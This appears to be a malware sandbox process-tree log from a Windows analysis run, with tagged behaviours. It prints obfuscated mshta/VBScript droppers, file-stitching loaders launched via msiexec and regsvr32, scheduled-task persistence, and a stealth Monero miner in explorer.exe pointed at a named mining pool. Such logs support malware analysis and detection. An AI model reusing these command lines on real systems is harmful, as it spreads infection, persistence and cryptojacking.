C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )11⤵PID:2468
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵PID:2872
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )11⤵PID:2096
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC12⤵PID:556
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵PID:3092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵PID:3084
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵PID:3148
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:1196 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵
- Loads dropped DLL
PID:1072 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2660
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"7⤵
- Executes dropped EXE
PID:2508
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵PID:1012
-
-
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2280 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2280 -s 14168⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:2056
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵PID:2948
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵PID:1756
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:3644
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Creates scheduled task(s)
PID:3676
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:3840
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe10⤵
- Executes dropped EXE
PID:3900 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3348 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"12⤵
- Executes dropped EXE
PID:2884 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"13⤵PID:2956
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2640
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17a0d8ec302e.exe4⤵
- Loads dropped DLL
PID:1332 -
C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17a0d8ec302e.exeMon17a0d8ec302e.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17332e41e6b.exe4⤵PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1708beae021a5ff.exe4⤵PID:1116
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon1708beae021a5ff.exeMon1708beae021a5ff.exe1⤵
- Executes dropped EXE
PID:2040
-
C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17332e41e6b.exeMon17332e41e6b.exe1⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2088 -
C:\Users\Admin\AppData\Roaming\874733.exe"C:\Users\Admin\AppData\Roaming\874733.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3068
-
-
C:\Users\Admin\AppData\Roaming\5117413.exe"C:\Users\Admin\AppData\Roaming\5117413.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1080
-
-
C:\Users\Admin\AppData\Roaming\5880355.exe"C:\Users\Admin\AppData\Roaming\5880355.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2060
-
-
C:\Users\Admin\AppData\Roaming\2103771.exe"C:\Users\Admin\AppData\Roaming\2103771.exe"2⤵
- Executes dropped EXE
PID:2312 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\2103771.exe"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """"== """" for %T in ( ""C:\Users\Admin\AppData\Roaming\2103771.exe"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )3⤵PID:2952
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\2103771.exe" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""== "" for %T in ( "C:\Users\Admin\AppData\Roaming\2103771.exe") do taskkill /im "%~nxT" /f4⤵PID:968
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "2103771.exe" /f5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
-
C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExELYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj5⤵
- Executes dropped EXE
PID:2264 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""/ptCSVoYGd9AYAP_3p6Sjuyj ""== """" for %T in ( ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )6⤵PID:2924
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "/ptCSVoYGd9AYAP_3p6Sjuyj "== "" for %T in ( "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE") do taskkill /im "%~nxT" /f7⤵PID:972
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt: cLOsE (cREAteoBject ( "wscRIPT.SHELl"). Run ( "C:\Windows\system32\cmd.exe /q /r ECho L%Time%07> 2B_LH.IT & EcHO | SEt /P = ""MZ"" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt +WL4sXR.MY +JkOFKWNK.Eo7 + 2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S " ,0 ,TRUe ) )6⤵PID:2516
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /r ECho L%Time> 2B_LH.IT & EcHO | SEt /P = "MZ" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt +WL4sXR.MY+JkOFKWNK.Eo7 +2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S7⤵PID:2092
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\8279270.exe"C:\Users\Admin\AppData\Roaming\8279270.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2380 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"3⤵
- Executes dropped EXE
PID:2752
-
-
-
C:\Users\Admin\AppData\Roaming\984612.exe"C:\Users\Admin\AppData\Roaming\984612.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon1708beae021a5ff.exe"C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon1708beae021a5ff.exe"1⤵
- Executes dropped EXE
PID:2068
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-20875194842143689969485825998-512177443-138272461726246300-6505230801793941740"1⤵
- Loads dropped DLL
PID:1624
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2388
-
C:\Windows\system32\taskeng.exetaskeng.exe {98B603D5-E31A-4583-843F-DD67E518C58F} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3124
-
C:\Windows\system32\taskeng.exetaskeng.exe {93229302-5279-4544-B7F4-CDC5E71272E8} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3188
-
C:\Program Files\Mozilla Firefox\default-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task2⤵
- Executes dropped EXE
PID:1012
-
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1140
-
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2172
-
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1140
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {5F11827C-6BF5-4E48-A47E-3A13BECC281C} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3628
-
C:\Windows\system32\taskeng.exetaskeng.exe {25261586-629D-4DD4-9DA4-041F16E328E1} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3964
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4016
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {16B62CD1-31FF-468E-8CF2-FBE49D443360} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3400
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3248
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {D6DDC036-09A5-4E2F-AC8D-D48829740FB1} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:1736
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:644
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {15782991-04F1-4C4A-843F-1A36E1185C8A} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:4068
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3084
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {638F770F-6D7F-4184-9ACE-DA2F9A6CF897} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2836
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Executes dropped EXE
- Suspicious behavior: MapViewOfSection
PID:2296
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {C7C72A88-A2BF-42C4-9D3A-75BD2AA2AC72} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:1980
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Suspicious behavior: MapViewOfSection
PID:2464
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {A56FC159-36EC-4861-85ED-BC6DEE3C8E7C} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1840
-
C:\Windows\system32\taskeng.exetaskeng.exe {61B64691-1E55-43C0-96E1-382786A59E6E} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3492
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1012
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {5018FD7C-8B43-4CD4-AC65-CF5DB131AF74} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2968
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1884
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {4A1EBE3E-00B8-41CA-93F5-B3908D4537F0} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3192
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3660
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {B3456DBF-B0E4-4373-80A8-4589B5E0031B} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2796
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4000
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {B35F0E3F-937C-47C9-834B-CEDE14CF36D5} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2836
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3676
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {57E56F9D-04AB-414C-9029-43B63A18E75F} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3796
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4076
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {DB835538-06A1-4EFC-8BE7-BB0AE551FC9F} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3200
-
C:\Windows\system32\taskeng.exetaskeng.exe {D7F9AAC5-A576-4170-9807-0AB5011F789F} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3756
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3776
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {8375E967-C4DD-45CB-9E31-5F1A92AE1329} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2168
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1564
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {63AADEB4-2456-46CC-ACB2-74ADD86E49CD} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:4084
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2940
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {7C9BD4D8-7328-4E39-92C4-A5B8B6EF63B7} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2412
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3392
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {7C1FAC83-4458-4E9D-A51D-C89D29A92C18} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3628
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3704
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {CF1C30FD-53CE-4553-B0E3-539EBEC9DC59} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:1800
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3048
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {D9E54739-DB3B-41CD-A0E6-01CE3F44C6DA} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3880
-
C:\Windows\system32\taskeng.exetaskeng.exe {652FEA32-933E-4FFB-9F98-BEC3CA0E1A1B} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:1732
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Suspicious behavior: MapViewOfSection
PID:1428
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {9EE3FE26-7615-4045-B9EF-4A3797C6EC83} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:288
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3400
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {ED9CC874-895D-4197-AAFD-E6CCC28C90C6} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3448
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3376
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {4B1B4172-589D-41D1-9EB5-B44A1955BE56} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:932
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:980
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {EEE89443-DF06-47DF-8BF0-C9F60092992C} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3892
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3428
-
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:456
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {2F1FD8BF-EB20-46C9-A87F-8225FB998761} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1840
-
C:\Windows\system32\taskeng.exetaskeng.exe {A5DF1694-DFD9-4214-99CD-048E1FC676CB} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2068
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2124
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {73AF0BD6-5329-41F4-8DB3-66D83F98098C} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3556
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:280
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {C90602E9-18A1-42ED-A5E1-4179C8891536} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3592
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:980
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {9B7A2D35-2BD9-4987-92D8-58E2DC4C358A} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2192
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2260
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {FCF95E9F-E796-4857-980C-F09FB267793D} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3652
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2176
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {5856259A-2EFC-4810-979E-4C5A2DC907B1} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3404
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3324
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {8E66FBD4-2F61-48BC-8E3E-4FF62F91DE84} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3908
-
C:\Windows\system32\taskeng.exetaskeng.exe {60A042C7-B4A9-4101-9824-766548DBE396} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:1840
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3056
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {776A3C7F-7075-47DB-988F-25C40205400C} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2432
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Suspicious behavior: MapViewOfSection
PID:2400
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {38BBB26C-A6D8-43C5-8E26-B27D7853C3B7} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3860
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3848
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {586B85DC-1E07-42F5-9A51-F2CDC2B3E1D9} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:4060
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3936
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {6B4FC830-69A1-47E9-8AD9-3D58F71DB9D8} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3776
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3520
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {C9996804-2157-41DA-A40B-8D6D49787AF7} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:1676
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵
- Suspicious behavior: MapViewOfSection
PID:3632
-
-
